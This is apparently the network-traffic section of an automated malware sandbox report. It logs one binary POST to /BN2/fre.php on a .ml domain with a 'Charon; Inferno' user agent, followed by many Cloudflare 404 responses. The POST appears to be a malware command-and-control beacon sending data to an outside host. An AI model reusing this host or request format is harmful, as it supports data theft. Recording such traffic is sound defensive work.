Source: global traffic	HTTP traffic detected: POST /BN2/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: vmopahtqdf84hfvsqepalcbcch63gdyvah.mlAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E576ACEContent-Length: 163Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:18:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bs2DoCx7o%2FFhS1TXQUi653vAatRTnco%2Bj1Xph31RuXJYFAAI7tRqGUe%2BJvJjK7%2FvGaCpbNqLq4uztQHgVCTrBZmvpAWvpqADiToFAAg2vURNJ6772rufR8bH7qGlxa1666jecxeRCiH8pLWXLf4V772ffth9koYA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189200a3b9f9162-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:18:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lCsfECh6JgcYZ7pIJr2eQu5siZtpRaj%2BvJmGRAlXh7NnnCmky4z0%2Ftbq7gmi2nJQ21olKqCXvnYoQaMxW8zi9v9v%2BPsvB5a5a6mF71tq7NGDEIxSYGdLK%2B7e3sgOAmGaNOfAee88Et4Mo1kCgfdVrSo5Es9uBG2w"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189201f7cbd9bf8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:18:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rU%2Bw0mXhB6I5FW0byQjeXSc4DSuosUBq41ZQFUynCHd%2FIup9PgsoCzNaNxSLJa%2FJKtSyiYOClgAhUhWc0%2FMLXIFk8BFho1kUrDpNS20n%2FDEDKZCyUzqFlWxkzH2iEXuVWxJVvnxtrwa8fRowDvks1JxlvkDWjXl0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892031ed199049-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:18:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uXy6R7N7z6LEN7AqRfBg%2FobdSWvsk%2FLampU5yejxWJM2gvbvHC2ZCrIkO26QjFnX3bh3ZHDAOxsB4VOa%2BxCvUz1BvSmDWPzNbtq1WDKY0JZUlbMHCmVn%2BgBpo4c85RuyeQ8YJ4u1mTZmewNjz2FR8b1AjoQnawqT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189203d0a686958-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:18:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3i%2BZz5EhRQLQWQjZgzwTku667al%2BHg9Nauc6yBlKELNFuVfQHJPwnyWDSu2chRBXzQZm6mEQGVYSzmQER86IlW8opZ7OA5ejtvPL1%2FbdeTcdEEw0KE5YezcNMIaLHwPcbA6ZZqnqeq%2FL9kt8g1NJ3iBGZukocF0d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189205a7b379223-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Cu%2BMdCCyKAnHdfvXBMuXzM9RYuSiORLzv0vY6CBBr2eldsUINwTcCdjcxDwE7wrCCLwqE%2FKH78mXNYQ%2FcO582%2FuCHfc%2B7YUIi4aIUcGJ4nbsU%2F4XiN0%2BszMOnglewUM9k6FUz6dsVCcEXl8UyHnARryUr7coumHk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189206adf119018-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yY2w6heR4mRduHrREJouCQA%2BdCGt2%2F%2FmporAmegdUA4k6pppNcWWeQ23XyNQq2pEYwvdK6Zc7vsvZEtPNoPy91oCBpF6RiusS1TRMBDJa6kjPNVMpC0NNyN8fSziudkGoRuyQvLR3GelKGNlCa0N324HRSGwx6%2BE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189207ab94f9b6e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y6YSAVSy8cBfmAk2QA0lWZWilRZiQs1K%2Bh9hfPDC%2Bi2NtGXcFXlKxkrYYkI4aBPzJuBIOwdvaPjoWHJQx5Z3KoBy%2BWvQjP9%2FQiRTSejz3KgKVGL4BKqfVjHOZSPTx6PAU4GJMOXz6BLbLxAjQJ8yEOgP4VJigzHu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920889c1a8fe8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b8MSANTLhY57IQV5J%2Bq590SFAfa8mPX9bdt%2BfyIrKU7C0awryNvP3xwGX6x7QIGXcC0HLmQNruTuvptf2LjRJLf15rv0sPOii6n6hw7PxtAYlfdDSOmfz%2FJDqq%2BqnO2J9XvQj%2Bv5lLWrgYTt4hogaa%2FlhDBTk2r4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920940b299b63-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bAa7lUP%2FtW8e0N4iGeDxKN5WLMDXFEbBR4a%2BhSchxSKv3qjY3N30mbXOirJsCF0mmbIzYRf00TmslYFDRahcustp8iJpnkiwDmhd%2BIVej2BPYxWXpnt0dskmGqGV%2BWq2jp35GhqGVyLGhZXJG3G3vAJx%2BPwAboIb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189209defea9b31-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cc32CSL9j%2BNDaVuhe%2FA%2FpImQ7S5ssEDJpqhUz9Np%2B3%2BF6Lpul2j95BgWQj4kZG8cNVBKs0m8fXc8hM%2B3IXUKEw%2Bk9blQPLBERU9FXvJ%2FShw1sHaZv%2FlIYzlC54Bqq%2BqyOQs2gQt5S9%2BPJRF1%2FljbhSDz48%2FoNbsC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920a55f939b22-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T0r8J8bS8Y9eqjksMbledDuOBM1HvyuR6q1WzJM4%2F%2BKvcn1jEbnobd5ciYxowswoZAiovpz%2Fy%2BJjdH2JILT5Fv5FP4OQ1RvPSdvM%2FE%2BfaoLFyrrdCiu7TeerrqOm9qAjcZP0uLHaPoAPu9ODm%2BhccWdisxFE1aBH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920b4cf479bb9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jKiQzg8eS1ae0ORIsvF4gHGO7m9qdmttXEzEmsz%2B%2FoEu1AUjsN3IadETfo64ifr4E%2BZwFGwUfhVU7GbVK7wUaMyEvw2n2D%2FGUq6BATBG%2FHBTgpa%2B6J8FUVywQYYqKEZY5zZ%2FJVFpMECXpSudXGcN84bXQShVQf8Y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920c8c88e9b2e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZwckYkvSFT0pt0b04qtzhI1kMsG5qlNQy89EepY08iSSCW2dvGAtyLRjwEmD6oV7hiW53LUMjwl9QTcRdP6WCH%2FNlQnhAmMP57lcIqGF7dwLuo46azR27ks1D85iAl9DDgfEwWXwvY11zN3U7hLL4M1H89um43qN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920d08ade914c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DEHOfdOGNBr1U%2FKot4EZ%2BWPBNHC2PoT4hjwi5xTDvx1z6AuwHFw5xxvruyXvscKKtXcC2Be4qzdKMDyQb8wzynXBkx3LQOzIZC6P7VjYMpvAlt6GrJzgibr2TLrXaG11I9325RgvIFdrTDvqPTVJrC1jxXoVWfrj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920da8d809019-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8TKHGx1Jd20MEpkn1Gcmh1jINo4%2F5yZyAvoLhYqejTmZAMvoZXsPcNufHbn%2F4pZYDqH8RrMoRSSh9ru6C899e%2B1EJ4eDOY8UZUMuz2yJNrktGL7Nwqc6bC0O6hlQ2UKIzb%2FmaUAI2qlmBBgduzYAGtzZffIcEKeN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920e33c599131-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g8gdVOnxoFG9EH0CTn5qQ0wQuVZYEvah%2FK5d9B7EvMrPjLrTDXZalEZjQGKhctS4MMXuUXBViTRixr6T8I%2FJfv6jz3HJjZSNSCdds8sZa2%2Ba01w6eSlLHE7T64FX6tllwhfM1sl5L5D1YpAW0ROQDJI4vd1sdt3p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920ea4a6b8fee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jZBRjkz8%2B2y3HpL2tgT4taFdqFwsESYascnMyGV%2FyP%2FgH8CC1sw8BW%2FHOpwBOJsSTzqWc6%2BcyfArEfHhL75cZveNqLKMwWuoQ3ZNXgjVLdesB2AOT5%2Bia%2BtBamzsScTXmNLKfHpa9%2FOJtifWkfV8yUz6kDSiO%2BdP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920f2ba9c90ee-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T2JXpxOLNmP1mymnSzOq8pUqokKz1iNozPcpcMWCu5eP4klO%2FHuWjTqYDuN1MVfss2uqnylMfbtRfZwHj%2BBJfsS%2BlyFzU3f9Ao%2FDLwz2AEMP3VE2CGY2tdziP4i9aOV8iWaF2dlp7ynn6nILBWEiGWF7DsOQwDAd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718920fa888b9168-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WOuoQj9wVeDdG%2FMEiyudMbyDpybWcO%2Fq%2BPi8bsQO6zHwZbUwjcECW3HrvSoZNezqLeO76TKD9CbhdE%2FmrFyoFMq0kkQg41nLUcND6v6qHQcHOLiEEHQYWZo5%2BIM%2FrsXIRRpbSqFpAtph8QwYG8zxRGXtIHf1uUi3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921041ad16958-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GFUADe%2F2jSsWaJOoInaIPwbTbcbw0iJiS%2BfYtGCHzwHMdB8g4wucqx15mp4D8hPGEhHUZJ94YY%2BEsmQUDKe9PsDIAss9e%2BBfO9Lo21dPSKwW%2F10nf6u6OhV76ZeiljwZ11apn363FXDoo1iqP1r7t2RJ5cgMEx0t"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189210c0dc591f6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s4sV7e6M5lllzYCK63pJb1PewwfnQ3vL2rl%2BGY1Frn7MliVIXjbDJYRO9XB54mNkKvOwUO90zJTVbGvEk3muV%2BxlGFDsJqrg8yw6r8yq411TTcymJm0jsXJxYFeqb0SnE1J51U2UoqBhws3BAML34dtXecTCROfi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189211d6ced9bb8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eLZ%2BoIsb6vAsQId0wexvveJG2G4mmjT8To5s671CY9cBsCCAM3dj6e2%2FHAnasxU54HfD5%2FmUvYwrJH1WgbpNs%2FAtnEBCH8G6UsvzAT5FNtvIP9StDtGENIVxyidNsZowBHbt91eIrszGVFx3EPNeeg%2F74Rs7vlCP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189213fb87e90dc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O0u7YBCUyETkybJoGufOz4jXPixi%2Bd41t2lMBsfy3LZ909xdl0uwHIm43ORVizviXi4cYvkpvHvvlKvDt6cGxZiuol0vfZw7J0TFEub9CcHK7R7Cyz2O7%2BWrjdQX9SjLV3UlprAy8sePdYdTEdwEmmTaCM5O0wyJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892150c8f5927a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=86VyKv%2BjC6XcSJ8EpxqsE9VRoez7Qrk8y1frtoa5WLREenwOTJUcU6OJVAmDaFQW%2FAg42m8JaYHgExd8CS3UqZhr7ZZXyON8i7wI7DckxuASM9uh%2B89riG19mn%2F2yZ17USiR9bluZfG5ivsPntIhs1xjXjGf%2FCRM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921677dd26934-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uj0vF73gywbb8yc3scd9SbHupt4nJfYnhd9t4BFLzVi4goIVgz7VfaUDTsl8nKe0Z5%2FyxWrYh7%2FpcbNyOCAdhgo6NcAUuK2hcOGSjyinMCv0CqNICzsBLcuAKaZ6r0TyWIo6XaAlCrMbhWEmzk7wygftRLeBThkH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892172491e9a2a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rvF0QbgH4XG55rvZvPHSALd3bCsTeqH5X%2B1jlif22jCSvNH3%2BL4cDWYAEYPCjc5lYfLhanoqeGfb1Lc1APMBoJ%2B3x28yhKgpshzpoF8oQS0p4wzD8tA1dPO%2FlJXfT7V%2BfBsNUzt0rj02F82Unez%2BMUCYNDVI6yHd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7189217ba9ef9bf8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEYPjXzzKchXqNruNU1r%2BaUba%2FD5yH%2B33DaNFahi4dCOIhbM6o6qqcor18btDnRhY20LDPb7bIzvqJHsOSxJo3DX9f5dEy%2BHBrHNgvpx8HIvox0CK7NK0DWSKbZDfdPp9ZIyg2i4wr0V3IM95P62SlLx%2BlF4EQLZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71892198bcbb9142-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jun 2022 10:19:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rzvfo8d18tZ9q%2FbNsgkgtBAemFcQH4gNtMC4iQaz3IKbUwG19DqPlpBmQ6BxComqAFxToOF26om99TNNCGBsR%2B00xBQB63GcKPIIY931PQErZ4CLdHgcm%2BH6TBjMxjWvgbriuClNpQzH3hoL8XxRlYlfwVNXVC6y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 718921a68caf904f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
